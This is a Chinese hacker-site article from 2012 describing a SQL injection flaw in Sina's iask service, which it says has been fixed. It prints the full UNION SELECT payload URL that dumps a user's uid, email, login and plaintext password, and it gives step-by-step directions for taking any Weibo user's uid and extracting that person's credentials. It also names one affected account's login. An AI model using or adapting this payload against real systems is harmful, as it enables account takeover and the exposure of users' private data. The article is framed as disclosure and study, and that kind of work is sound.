黑客365

首页 » 系统漏洞 » 阅读文章

新浪微博用户密码泄露漏洞解析

2012-01-05 14:25 2829 1 发表评论

漏洞状态

发现时间:2012-1-1 漏洞类型:sql注射 危害等级:高 漏洞状态:已修复

该漏洞发现后相关作者已联系新浪官方修复漏洞,目前漏洞已修补。发布此文,仅供参考学习。

新浪网iask存在sql注射漏洞,利用漏洞可读取iask数据库内内容。包括明文密码在内的7000多W新浪用户信息。

原漏洞存在点: http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9

源漏洞利用方式:

http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=1303977362+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11–

这里通过构造数据库查询语句获得用户uid=1303977362的uid、login、email、passwd等信息。通过修改字段还可以获取其他信息 。

直接举个例子比如通过新浪微博查找某人,点击他的个人资料。我们可以再浏览器地址栏处看到他的uid(新浪用户数字id),如uid为12715428867

直接构造地址
http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=12715428867+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11–

直接获得相关账号和密码

这里账号是luchenmagic密码为。。。。

该漏洞发现后原作者便通知了新浪官方,新浪在漏洞反馈和应急处理这方面做的不够快。收到漏洞后给好心人回邮件或者表示感谢都没有。可见有良心的黑客是不好当的,别人总以为你没那么好心。。。。等等。。。


收藏此文



评论 共1条 (RSS 2.0) 发表评论

  1. 游客3407154 says:

    危机啊。。。

发表评论

  • 使用新浪微博登陆
  • 
    疑问 冷笑 悲伤 坏蛋 感叹 微笑 脸红 大笑 吃惊 惊讶 困惑 酷 大声笑 恼火 古怪 转眼睛 给眼色 好主意 箭头 一般 哭了 绿人
  • want to say:

回到页首